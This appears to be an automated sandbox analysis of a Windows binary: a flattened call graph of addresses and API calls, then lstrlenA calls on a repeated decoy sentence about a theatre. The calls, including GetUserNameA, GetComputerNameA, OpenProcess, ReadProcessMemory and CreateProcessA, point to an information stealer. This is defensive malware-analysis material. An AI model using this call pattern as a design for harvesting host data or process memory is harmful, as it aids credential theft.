4045c0 34 API calls 13790->13791 13792 4042ed 13791->13792 13793 4045c0 34 API calls 13792->13793 13794 404306 13793->13794 13795 4045c0 34 API calls 13794->13795 13796 40431f 13795->13796 13797 4045c0 34 API calls 13796->13797 13798 404338 13797->13798 13799 4045c0 34 API calls 13798->13799 13800 404351 13799->13800 13801 4045c0 34 API calls 13800->13801 13802 40436a 13801->13802 13803 4045c0 34 API calls 13802->13803 13804 404383 13803->13804 13805 4045c0 34 API calls 13804->13805 13806 40439c 13805->13806 13807 4045c0 34 API calls 13806->13807 13808 4043b5 13807->13808 13809 4045c0 34 API calls 13808->13809 13810 4043ce 13809->13810 13811 4045c0 34 API calls 13810->13811 13812 4043e7 13811->13812 13813 4045c0 34 API calls 13812->13813 13814 404400 13813->13814 13815 4045c0 34 API calls 13814->13815 13816 404419 13815->13816 13817 4045c0 34 API calls 13816->13817 13818 404432 13817->13818 13819 4045c0 34 API calls 13818->13819 13820 40444b 13819->13820 13821 4045c0 34 API calls 13820->13821 13822 404464 13821->13822 13823 4045c0 34 API calls 13822->13823 13824 40447d 13823->13824 13825 4045c0 34 API calls 13824->13825 13826 404496 13825->13826 13827 4045c0 34 API calls 13826->13827 13828 4044af 13827->13828 13829 4045c0 34 API calls 13828->13829 13830 4044c8 13829->13830 13831 4045c0 34 API calls 13830->13831 13832 4044e1 13831->13832 13833 4045c0 34 API calls 13832->13833 13834 4044fa 13833->13834 13835 4045c0 34 API calls 13834->13835 13836 404513 13835->13836 13837 4045c0 34 API calls 13836->13837 13838 40452c 13837->13838 13839 4045c0 34 API calls 13838->13839 13840 404545 13839->13840 13841 4045c0 34 API calls 13840->13841 13842 40455e 13841->13842 13843 4045c0 34 API calls 13842->13843 13844 404577 13843->13844 13845 4045c0 34 API calls 13844->13845 13846 404590 13845->13846 13847 4045c0 34 API calls 13846->13847 13848 4045a9 13847->13848 13849 419c10 13848->13849 13850 41a036 8 API calls 13849->13850 13852 419c20 13849->13852 13851 41a0cc 13850->13851 13851->13132 13852->13850 13855 415521 13853->13855 13854 4152c0 9 API calls 13854->13855 13855->13854 13856 4151f0 8 API calls 13855->13856 13857 4157dc 13855->13857 13856->13855 13857->13134 13860 417548 GetVolumeInformationA 13858->13860 13861 417591 13860->13861 13861->13136 13863 404899 13862->13863 14075 4047b0 13863->14075 13865 404ebe codecvt 13865->13138 13866 404ea9 InternetCloseHandle 13866->13865 13867 4048a5 13867->13865 13867->13866 13869 4117c4 13868->13869 13870 4117d7 13869->13870 13871 4117cf ExitProcess 13869->13871 13872 4117e7 strtok_s 13870->13872 13875 4117f4 13872->13875 13873 4119c2 13873->13140 13874 41199e strtok_s 13874->13875 13875->13873 13875->13874 13877 405979 13876->13877 13878 4047b0 4 API calls 13877->13878 13880 405985 13878->13880 13879 405f1a codecvt 13879->13142 13880->13879 13881 405ebe memcpy 13880->13881 13882 405ed7 13881->13882 13883 405ef7 memcpy 13882->13883 13883->13879 14083 41aad0 13884->14083 13886 411077 strtok_s 13889 411084 13886->13889 13887 411151 13887->13144 13888 41112d strtok_s 13888->13889 13889->13887 13889->13888 14084 41aad0 13890->14084 13892 410db7 strtok_s 13895 410dc4 13892->13895 13893 410f17 13893->13148 13894 410ef3 strtok_s 13894->13895 13895->13893 13895->13894 14085 41aad0 13896->14085 13898 410f67 strtok_s 13900 410f74 13898->13900 13899 411044 13899->13152 13900->13899 13901 411020 strtok_s 13900->13901 13901->13900 13903 411a26 13902->13903 13904 417500 GetVolumeInformationA 13903->13904 13905 411b96 13904->13905 13906 417850 GetUserNameA 13905->13906 13907 411d14 13906->13907 13908 4178e0 GetComputerNameA 13907->13908 13909 411d8e 13908->13909 14086 415190 13909->14086 13911 412699 13911->13154 13915 404fd0 13912->13915 13913 405070 memcpy 13913->13915 13914 4050a0 13914->13156 13915->13913 13915->13914 14100 4098d0 13916->14100 13918 410759 13919 410a38 13918->13919 13922 41077d 13918->13922 14127 410250 13919->14127 13921 410a4e 13921->13158 13927 410843 13922->13927 14103 40fb00 13922->14103 13924 410a2d 13924->13158 13925 41096b 13925->13924 14119 410030 13925->14119 13927->13925 14111 40fd60 13927->14111 14308 41aad0 13929->14308 13931 411197 strtok_s 13934 4111a4 13931->13934 13932 4112b0 13932->13162 13933 41128c strtok_s 13933->13934 13934->13932 13934->13933 13939 401e8f 13935->13939 13936 401f37 14313 401310 memset 13936->14313 13938 401f4d 13938->13164 13939->13936 14309 4016d0 13939->14309 14319 41aad0 13941->14319 13943 411306 strtok_s 13946 41133b codecvt 13943->13946 13944 411773 13944->13173 13945 411740 strtok_s 13945->13946 13946->13944 13946->13945 13949 413dcf 13947->13949 13948 413e18 13948->13174 13949->13948 14320 413c90 13949->14320 14333 41aad0 13951->14333 13953 413587 strtok_s 13957 4135a1 13953->13957 13954 4136eb 13954->13174 13955 4136c7 strtok_s 13955->13957 13957->13954 13957->13955 14334 412e30 13957->14334 13959 4140fa codecvt 13958->13959 14343 413ea0 13959->14343 13961 414185 13962 413ea0 7 API calls 13961->13962 13963 4141af 13962->13963 13964 413ea0 7 API calls 13963->13964 13965 4141d9 13964->13965 13966 413ea0 7 API calls 13965->13966 13967 414203 13966->13967 13968 413ea0 7 API calls 13967->13968 13969 41422d 13968->13969 13970 413ea0 7 API calls 13969->13970 13971 414257 codecvt 13970->13971 13971->13180 13973 415113 13972->13973 14347 4172f0 13973->14347 13975 415118 13976 415190 7 API calls 13975->13976 13977 415163 13976->13977 13977->13176 13979 41479a codecvt 13978->13979 13981 4148af codecvt 13979->13981 14510 414570 13979->14510 13981->13179 13983 414bca codecvt 13982->13983 14522 414910 13983->14522 13985 414c3d 13986 414910 7 API calls 13985->13986 13987 414c72 13986->13987 13988 414910 7 API calls 13987->13988 13989 414ca8 13988->13989 13990 414910 7 API calls 13989->13990 13991 414cdd 13990->13991 13992 414910 7 API calls 13991->13992 13993 414d13 13992->13993 13994 414910 7 API calls 13993->13994 13995 414d48 codecvt 13994->13995 13995->13182 13997 414d9e 13996->13997 13998 414910 7 API calls 13997->13998 13999 414dff memset 13998->13999 14000 414e2a 13999->14000 14001 414910 7 API calls 14000->14001 14002 414e8b memset 14001->14002 14003 414eb6 14002->14003 14004 414910 7 API calls 14003->14004 14005 414f17 memset 14004->14005 14006 414f3c 14005->14006 14006->13184 14008 414f5a codecvt 14007->14008 14009 414910 7 API calls 14008->14009 14010 414ff3 14009->14010 14011 414910 7 API calls 14010->14011 14012 415028 codecvt 14011->14012 14012->13187 14014 40771d codecvt 14013->14014 14527 4075d0 14014->14527 14017 4075d0 13 API calls 14018 407c9f 14017->14018 14019 4075d0 13 API calls 14018->14019 14020 407cae 14019->14020 14021 4075d0 13 API calls 14020->14021 14022 407cbd 14021->14022 14023 4075d0 13 API calls 14022->14023 14024 407ccc 14023->14024 14025 4075d0 13 API calls 14024->14025 14026 407cdb 14025->14026 14027 4075d0 13 API calls 14026->14027 14028 407cea 14027->14028 14029 4075d0 13 API calls 14028->14029 14030 407cf9 14029->14030 14031 4075d0 13 API calls 14030->14031 14032 407d08 14031->14032 14033 4075d0 13 API calls 14032->14033 14034 407d17 14033->14034 14035 4075d0 13 API calls 14034->14035 14036 407d26 14035->14036 14037 4075d0 13 API calls 14036->14037 14038 407d35 14037->14038 14039 4075d0 13 API calls 14038->14039 14040 407d44 14039->14040 14041 4075d0 13 API calls 14040->14041 14042 407d53 14041->14042 14043 4075d0 13 API calls 14042->14043 14044 407d62 14043->14044 14045 4075d0 13 API calls 14044->14045 14046 407d71 14045->14046 14047 4075d0 13 API calls 14046->14047 14048 407d80 14047->14048 14049 4075d0 13 API calls 14048->14049 14050 407d8f 14049->14050 14051 4075d0 13 API calls 14050->14051 14052 407d9e 14051->14052 14053 4075d0 13 API calls 14052->14053 14054 407dad 14053->14054 14055 4075d0 13 API calls 14054->14055 14056 407dbc 14055->14056 14057 4075d0 13 API calls 14056->14057 14058 407dcb 14057->14058 14059 4075d0 13 API calls 14058->14059 14060 407dda 14059->14060 14061 4075d0 13 API calls 14060->14061 14062 407de9 codecvt 14061->14062 14063 415190 7 API calls 14062->14063 14064 407e77 codecvt 14062->14064 14063->14064 14064->13189 14066 41506a codecvt 14065->14066 14067 414910 7 API calls 14066->14067 14068 4150dd codecvt 14067->14068 14068->13192 14071 419027 codecvt 14069->14071 14070 41904d 14070->13185 14071->14070 14706 418f30 14071->14706 14073 419140 14073->14070 14074 415190 7 API calls 14073->14074 14074->14070 14081 401030 14075->14081 14078 404838 14079 404848 InternetCrackUrlA 14078->14079 14080 404867 14079->14080 14080->13867 14082 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 14081->14082 14082->14078 14083->13886 14084->13892 14085->13898 14087 4151b5 14086->14087 14090 405100 14087->14090 14089 4151cf 14089->13911 14091 405119 14090->14091 14092 4047b0 4 API calls 14091->14092 14094 405125 14092->14094 14093 40580d codecvt 14093->14089 14094->14093 14095 405787 memcpy 14094->14095 14096 4057a8 14095->14096 14097 4057af memcpy 14096->14097 14098 4057c7 14097->14098 14099 4057e7 memcpy 14098->14099 14099->14093 14138 409880 ??2@YAPAXI 14100->14138 14102 4098e1 14102->13918 14104 40fb16 14103->14104 14105 40fc33 14104->14105 14152 409ce0 14104->14152 14158 40be70 14105->14158 14108 40fc9a 14169 40ec30 14108->14169 14110 40fd0c 14110->13927 14113 40fd76 14111->14113 14112 40fefa 14115 40be70 24 API calls 14112->14115 14113->14112 14114 409ce0 2 API calls 14113->14114 14114->14112 14116 40ff61 14115->14116 14117 40ec30 7 API calls 14116->14117 14118 40ffd3 14117->14118 14118->13925 14120 410046 14119->14120 14122 41021e 14120->14122 14235 4126c0 14120->14235 14122->13924 14123 410138 14123->14122 14249 40da80 14123->14249 14125 41019f 14257 40f6b0 14125->14257 14128 410266 14127->14128 14129 41030f strtok_s 14128->14129 14130 4106ee 14128->14130 14134 410334 14129->14134 14130->13921 14131 41068a 14133 415190 7 API calls 14131->14133 14132 4188e0 malloc strncpy 14132->14134 14135 4106c4 14133->14135 14134->14131 14134->14132 14137 41066f strtok_s 14134->14137 14136 4106d5 memset 14135->14136 14136->14130 14137->14134 14141 406fb0 14138->14141 14140 4098ad codecvt 14140->14102 14144 406d40 14141->14144 14143 406fd8 14143->14140 14145 406d63 14144->14145 14147 406d59 14144->14147 14145->14147 14148 4069b0 14145->14148 14147->14143 14149 4069c9 14148->14149 14151 4069d5 14148->14151 14150 406aad memcpy 14149->14150 14149->14151 14150->14151 14151->14147 14154 409d03 14152->14154 14153 409dba 14153->14105 14154->14153 14155 409d87 memcmp 14154->14155 14155->14153 14156 409d9f 14155->14156 14173 409b60 14156->14173 14163 40be86 14158->14163 14159 40bf04 14159->14108 14161 40be70 24 API calls 14161->14163 14162 40a790 24 API calls 14162->14163 14163->14159 14163->14161 14163->14162 14165 415190 7 API calls 14163->14165 14177 40a260 14163->14177 14183 40aef0 14163->14183 14187 40b4f0 14163->14187 14193 40ba80 14163->14193 14199 40b230 14163->14199 14165->14163 14172 40ec3f 14169->14172 14170 40ecf9 14170->14110 14172->14170 14231 40e430 14172->14231 14174 409b8a 14173->14174 14175 409bcf 14174->14175 14176 409bb6 memcpy 14174->14176 14175->14153 14176->14175 14181 40a276 14177->14181 14178 40a6b3 14180 415190 7 API calls 14178->14180 14179 40a6f7 14179->14163 14180->14179 14181->14178 14181->14179 14203 409e10 14181->14203 14186 40af06 14183->14186 14184 415190 7 API calls 14185 40b1b9 14184->14185 14185->14163 14186->14184 14186->14185 14192 40b506 14187->14192 14188 40b9b9 14189 415190 7 API calls 14188->14189 14190 40ba11 14188->14190 14189->14190 14190->14163 14191 409e10 15 API calls 14191->14192 14192->14188 14192->14190 14192->14191 14198 40ba96 14193->14198 14194 409e10 15 API calls 14194->14198 14195 40bd9c 14196 415190 7 API calls 14195->14196 14197 40bdf4 14195->14197 14196->14197 14197->14163 14198->14194 14198->14195 14198->14197 14200 40b246 14199->14200 14201 415190 7 API calls 14200->14201 14202 40b47d 14200->14202 14201->14202 14202->14163 14204 409e94 14203->14204 14205 409e1f memcmp 14203->14205 14206 409ea1 memcmp 14204->14206 14211 409e61 14204->14211 14205->14204 14209 409e3a 14205->14209 14207 409ec0 14206->14207 14206->14211 14208 409ee0 memset 14207->14208 14207->14211 14208->14211 14212 410a60 14209->14212 14211->14181 14222 410a79 14212->14222 14213 410c00 memset 14226 41aad0 14213->14226 14215 410c2d lstrcatA lstrcatA 14227 41aad0 14215->14227 14217 410c55 lstrcatA lstrcatA 14228 41aad0 14217->14228 14219 410c80 lstrcatA lstrcatA lstrlenA 14229 418ea0 14219->14229 14221 410cc2 memset memset 14223 410d0c 14221->14223 14222->14213 14224 410d57 CreateProcessA WaitForSingleObject 14223->14224 14225 410d77 14224->14225 14225->14211 14226->14215 14227->14217 14228->14219 14230 418ea9 codecvt 14229->14230 14230->14221 14233 40e44d 14231->14233 14232 40e4b1 14232->14172 14233->14232 14234 40de10 7 API calls 14233->14234 14234->14233 14236 4126d6 14235->14236 14248 412c1b 14235->14248 14263 4060a0 14236->14263 14238 412b61 14239 4060a0 4 API calls 14238->14239 14240 412b88 14239->14240 14241 4060a0 4 API calls 14240->14241 14242 412bac 14241->14242 14243 4060a0 4 API calls 14242->14243 14244 412bd3 14243->14244 14245 4060a0 4 API calls 14244->14245 14246 412bf7 14245->14246 14247 4060a0 4 API calls 14246->14247 14247->14248 14248->14123 14252 40da96 14249->14252 14250 40dafa 14250->14125 14252->14250 14256 40da80 11 API calls 14252->14256 14267 40cef0 14252->14267 14273 40d400 14252->14273 14277 40c990 14252->14277 14285 40d780 14252->14285 14256->14252 14261 40f6c6 14257->14261 14258 40f72d 14258->14122 14259 40f6b0 8 API calls 14259->14261 14261->14258 14261->14259 14289 4194d0 14261->14289 14293 40f4a0 14261->14293 14264 4060b9 14263->14264 14265 4047b0 4 API calls 14264->14265 14266 4060c5 codecvt 14265->14266 14266->14238 14272 40cf06 14267->14272 14268 40d380 memset 14269 40d391 14268->14269 14269->14252 14270 415190 7 API calls 14271 40d36f 14270->14271 14271->14268 14272->14268 14272->14269 14272->14270 14276 40d416 14273->14276 14274 40d6e7 14274->14252 14275 415190 7 API calls 14275->14274 14276->14274 14276->14275 14279 40c9a4 14277->14279 14278 40ce7f 14278->14252 14279->14278 14280 40caae ??2@YAPAXI 14279->14280 14284 40cadf 14280->14284 14281 40ce3b 14282 415190 7 API calls 14281->14282 14282->14278 14283 40c820 memset memcpy 14283->14284 14284->14281 14284->14283 14287 40d796 14285->14287 14286 40d9ee 14286->14252 14287->14286 14288 415190 7 API calls 14287->14288 14288->14286 14297 41d830 14289->14297 14292 419503 14292->14261 14295 40f4bf 14293->14295 14294 40f653 14294->14261 14295->14294 14299 40f300 14295->14299 14298 4194dd memset 14297->14298 14298->14292 14301 40f313 14299->14301 14300 40f43c 14300->14294 14301->14300 14303 40ed20 14301->14303 14306 40ed31 14303->14306 14304 40ed6a 14304->14300 14305 415190 7 API calls 14305->14306 14306->14304 14306->14305 14307 40ed20 7 API calls 14306->14307 14307->14306 14308->13931 14310 4016e6 codecvt 14309->14310 14311 401932 14310->14311 14312 415190 7 API calls 14310->14312 14311->13939 14312->14310 14314 401344 14313->14314 14315 415190 7 API calls 14314->14315 14316 4014d2 14314->14316 14318 40152a 14314->14318 14315->14316 14317 40150b memset 14316->14317 14317->14318 14318->13938 14319->13943 14327 41aad0 14320->14327 14322 413caa strtok_s 14323 413cbe 14322->14323 14324 413d32 codecvt 14323->14324 14326 413d47 strtok_s 14323->14326 14328 4138b0 14323->14328 14324->13949 14326->14323 14327->14322 14331 4138d2 codecvt __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14328->14331 14329 413909 14329->14323 14330 4138b0 7 API calls 14330->14331 14331->14329 14331->14330 14332 415190 7 API calls 14331->14332 14332->14331 14333->13953 14335 412e46 14334->14335 14336 413398 14335->14336 14338 413047 14335->14338 14339 4131e5 14335->14339 14342 41315a 14335->14342 14337 4060a0 4 API calls 14336->14337 14337->14342 14340 4060a0 4 API calls 14338->14340 14341 4060a0 4 API calls 14339->14341 14340->14342 14341->14342 14342->13957 14344 413ec9 codecvt 14343->14344 14345 413eef codecvt 14344->14345 14346 415190 7 API calls 14344->14346 14345->13961 14346->14344 14348 4172fe 14347->14348 14351 4170d0 ??_U@YAPAXI 14348->14351 14350 41730d 14350->13975 14366 41a740 14351->14366 14353 417111 OpenProcess 14354 41712b 14353->14354 14363 417148 construct 14353->14363 14354->14350 14355 417155 memset 14368 416f00 strlen ??_U@YAPAXI 14355->14368 14356 4172ae ??_V@YAXPAX 14356->14354 14358 4171d9 ReadProcessMemory 14358->14363 14359 4171c5 14359->14356 14362 408060 memcpy codecvt 14362->14363 14363->14355 14363->14356 14363->14358 14363->14359 14363->14362 14364 417275 14363->14364 14375 417320 14363->14375 14381 416b60 14363->14381 14395 408060 14364->14395 14367 41a750 14366->14367 14367->14353 14398 416bd0 strlen 14368->14398 14370 416f84 VirtualQueryEx 14371 4170a9 ??_V@YAXPAX 14370->14371 14374 416f6c 14370->14374 14372 417008 14371->14372 14372->14363 14373 416de0 ReadProcessMemory 14373->14374 14374->14370 14374->14372 14374->14373 14376 417331 construct 14375->14376 14402 408290 14376->14402 14378 417345 14406 408260 14378->14406 14382 417320 9 API calls 14381->14382 14383 416b73 14382->14383 14485 4173a0 14383->14485 14386 416b8f 14489 4173d0 14386->14489 14387 416bae 14493 409540 14387->14493 14392 408060 codecvt memcpy 14394 416ba9 14392->14394 14393 408060 codecvt memcpy 14393->14394 14394->14363 14396 408290 codecvt memcpy 14395->14396 14397 408073 task 14396->14397 14397->14354 14399 416c01 strlen 14398->14399 14400 416d60 14399->14400 14401 416c17 14399->14401 14400->14374 14401->14399 14403 4082a1 codecvt task 14402->14403 14404 4082a3 14402->14404 14403->14378 14404->14403 14411 4071e0 memcpy 14404->14411 14412 4071c0 strlen 14406->14412 14408 408270 14413 4085f0 14408->14413 14410 408280 14410->14363 14411->14403 14412->14408 14414 408603 14413->14414 14415 40862a 14414->14415 14416 40860a codecvt 14414->14416 14435 408cd0 14415->14435 14422 408c10 14416->14422 14418 408628 codecvt 14418->14410 14420 408638 codecvt 14420->14418 14444 4071e0 memcpy 14420->14444 14423 408c21 construct 14422->14423 14425 408c2e construct 14423->14425 14445 4086e0 14423->14445 14426 408c52 14425->14426 14427 408c77 14425->14427 14448 408f40 14426->14448 14429 408cd0 construct 7 API calls 14427->14429 14433 408c85 codecvt 14429->14433 14430 408c67 14431 408f40 construct 6 API calls 14430->14431 14432 408c75 codecvt 14431->14432 14432->14418 14433->14432 14454 4071e0 memcpy 14433->14454 14436 408ce1 construct 14435->14436 14437 408cee 14436->14437 14463 408db0 14436->14463 14439 408cf9 14437->14439 14442 408d0e 14437->14442 14466 409010 14439->14466 14441 408d0c codecvt 14441->14420 14442->14441 14443 408290 codecvt memcpy 14442->14443 14443->14441 14444->14418 14455 41d930 14445->14455 14449 408f54 14448->14449 14451 408f5c codecvt 14448->14451 14450 4086e0 construct 5 API calls 14449->14450 14450->14451 14453 408fa9 codecvt 14451->14453 14462 407200 memmove 14451->14462 14453->14430 14454->14432 14456 41ab69 std::exception::exception strlen malloc strcpy_s 14455->14456 14457 41d94a 14456->14457 14458 41d9a4 __CxxThrowException@8 RaiseException 14457->14458 14459 41d95f 14458->14459 14460 41abf7 std::exception::exception strlen malloc strcpy_s free 14459->14460 14461 4086f1 14460->14461 14461->14425 14462->14453 14474 41d8e3 14463->14474 14467 409046 construct 14466->14467 14481 4091d0 14467->14481 14469 409140 14470 408290 codecvt memcpy 14469->14470 14472 40914f codecvt 14470->14472 14471 4090be codecvt 14471->14469 14484 4071e0 memcpy 14471->14484 14472->14441 14475 41ab69 std::exception::exception strlen malloc strcpy_s 14474->14475 14476 41d8fd 14475->14476 14477 41d9a4 __CxxThrowException@8 RaiseException 14476->14477 14478 41d912 14477->14478 14479 41abf7 std::exception::exception strlen malloc strcpy_s free 14478->14479 14480 408dc1 14479->14480 14480->14437 14482 4093e0 allocator 5 API calls 14481->14482 14483 4091e2 14482->14483 14483->14471 14484->14469 14486 4173af construct codecvt 14485->14486 14499 417460 14486->14499 14488 416b81 14488->14386 14488->14387 14490 4173e5 14489->14490 14504 417410 14490->14504 14494 409558 construct 14493->14494 14495 408290 codecvt memcpy 14494->14495 14496 40956c 14495->14496 14497 408c10 construct 8 API calls 14496->14497 14498 40957c 14497->14498 14498->14393 14500 4174be codecvt 14499->14500 14502 417474 codecvt 14499->14502 14500->14488 14502->14500 14503 416b40 memchr 14502->14503 14503->14502 14505 417425 construct 14504->14505 14506 408290 codecvt memcpy 14505->14506 14507 417439 14506->14507 14508 408c10 construct 8 API calls 14507->14508 14509 416ba1 14508->14509 14509->14392 14511 414586 14510->14511 14512 4145d2 codecvt 14511->14512 14514 414699 codecvt 14511->14514 14516 414280 memset memset 14511->14516 14512->13981 14514->14512 14515 415190 7 API calls 14514->14515 14515->14512 14517 4142da 14516->14517 14518 409ce0 2 API calls 14517->14518 14521 41448e codecvt 14517->14521 14519 414390 codecvt 14518->14519 14520 409e10 15 API calls 14519->14520 14519->14521 14520->14521 14521->14511 14525 414932 codecvt 14522->14525 14523 414958 14523->13985 14524 414910 7 API calls 14524->14525 14525->14523 14525->14524 14526 415190 7 API calls 14525->14526 14526->14525 14532 4072d0 14527->14532 14530 407700 14530->14017 14531 4075eb 14547 408120 14531->14547 14533 4072dd 14532->14533 14534 4072ee memset 14533->14534 14545 407340 14534->14545 14535 407540 14572 4080e0 14535->14572 14538 408120 task memcpy 14539 40755a 14538->14539 14539->14531 14541 408080 9 API calls 14541->14545 14545->14535 14545->14541 14546 409220 strcpy_s 14545->14546 14550 407570 14545->14550 14555 409240 vsprintf_s 14545->14555 14556 408160 14545->14556 14567 4075a0 14545->14567 14546->14545 14548 4084d0 task memcpy 14547->14548 14549 40812f task 14548->14549 14549->14530 14576 408030 14550->14576 14553 408030 memcpy 14554 40758d 14553->14554 14554->14545 14555->14545 14557 408172 construct 14556->14557 14558 408202 14557->14558 14562 408185 construct 14557->14562 14559 40821a 14558->14559 14560 408460 9 API calls 14558->14560 14591 409270 14559->14591 14560->14559 14561 4081b9 14587 4092b0 14561->14587 14562->14561 14580 408460 14562->14580 14565 4081ee 14565->14545 14568 408060 codecvt memcpy 14567->14568 14569 4075b2 14568->14569 14570 408060 codecvt memcpy 14569->14570 14571 4075bd 14570->14571 14571->14545 14573 4080f8 construct 14572->14573 14664 408330 14573->14664 14575 40754f 14575->14538 14577 408041 construct 14576->14577 14578 408290 codecvt memcpy 14577->14578 14579 407582 14578->14579 14579->14553 14581 408471 14580->14581 14582 408484 14581->14582 14585 40848e 14581->14585 14595 408b30 14582->14595 14584 40848c 14584->14561 14585->14584 14598 408820 14585->14598 14588 4092bc construct 14587->14588 14648 409490 14588->14648 14592 40927c construct 14591->14592 14657 409470 14592->14657 14596 41d8e3 std::_Xinvalid_argument 5 API calls 14595->14596 14597 408b41 14596->14597 14597->14584 14599 40884d 14598->14599 14600 408852 14599->14600 14601 40885f 14599->14601 14602 408b30 5 API calls 14600->14602 14607 40885a task 14601->14607 14609 408e60 14601->14609 14602->14607 14606 4088a2 14606->14607 14615 408aa0 14606->14615 14607->14584 14618 409380 14609->14618 14612 4092d0 14632 4095a0 14612->14632 14640 409300 14615->14640 14619 40887f 14618->14619 14620 40939c 14618->14620 14619->14612 14621 4093a5 ??2@YAPAXI 14620->14621 14622 4093be 14620->14622 14621->14619 14621->14622 14626 407130 14622->14626 14627 41ab69 std::exception::exception strlen malloc strcpy_s 14626->14627 14628 407143 14627->14628 14629 41d9a4 14628->14629 14630 41d9d9 RaiseException 14629->14630 14631 41d9cd 14629->14631 14630->14619 14631->14630 14633 4095b1 _Copy_impl 14632->14633 14636 409730 14633->14636 14637 40975f 14636->14637 14638 4092ef 14637->14638 14639 4092b0 construct 8 API calls 14637->14639 14638->14606 14639->14637 14641 409311 _Copy_impl 14640->14641 14644 409600 14641->14644 14645 409605 14644->14645 14646 408abb 14645->14646 14647 4097f0 task memcpy 14645->14647 14646->14607 14647->14645 14650 4094a4 construct 14648->14650 14649 4092cc 14649->14565 14650->14649 14652 4094e0 14650->14652 14653 409540 construct 8 API calls 14652->14653 14654 409503 14653->14654 14655 409540 construct 8 API calls 14654->14655 14656 409515 14655->14656 14656->14649 14660 409670 14657->14660 14662 409687 construct 14660->14662 14661 40928c 14661->14565 14662->14661 14663 4094e0 construct 8 API calls 14662->14663 14663->14661 14665 408346 14664->14665 14670 408341 std::error_category::default_error_condition 14664->14670 14666 4083c7 14665->14666 14667 40836f 14665->14667 14688 4084d0 14666->14688 14673 408a50 14667->14673 14670->14575 14671 408377 construct 14671->14670 14677 408700 14671->14677 14674 408a65 14673->14674 14692 408dd0 14674->14692 14678 408712 construct 14677->14678 14679 4087af 14678->14679 14681 408729 construct 14678->14681 14680 408460 9 API calls 14679->14680 14682 4087c7 construct 14679->14682 14680->14682 14683 408460 9 API calls 14681->14683 14685 40875d construct 14681->14685 14684 4092b0 construct 8 API calls 14682->14684 14683->14685 14686 40879b 14684->14686 14687 4092b0 construct 8 API calls 14685->14687 14686->14671 14687->14686 14689 4084df task 14688->14689 14691 4084fc task 14688->14691 14690 408aa0 task memcpy 14689->14690 14690->14691 14691->14670 14693 408de9 std::error_category::default_error_condition 14692->14693 14694 408a8f 14693->14694 14698 409340 14693->14698 14694->14671 14697 408aa0 task memcpy 14697->14694 14699 409351 _Copy_impl 14698->14699 14702 409630 14699->14702 14704 409635 construct 14702->14704 14703 408e20 14703->14697 14704->14703 14705 4096c0 _Copy_impl 8 API calls 14704->14705 14705->14704 14707 418f59 14706->14707 14708 418f67 malloc 14707->14708 14709 418f5f 14707->14709 14708->14709 14710 418f85 14708->14710 14709->14073 14710->14709 14711 418fcd memset 14710->14711 14711->14709 15116 416af3 15117 416ab1 15116->15117 15118 415b10 145 API calls 15117->15118 15119 416b16 15118->15119

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                                                    • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
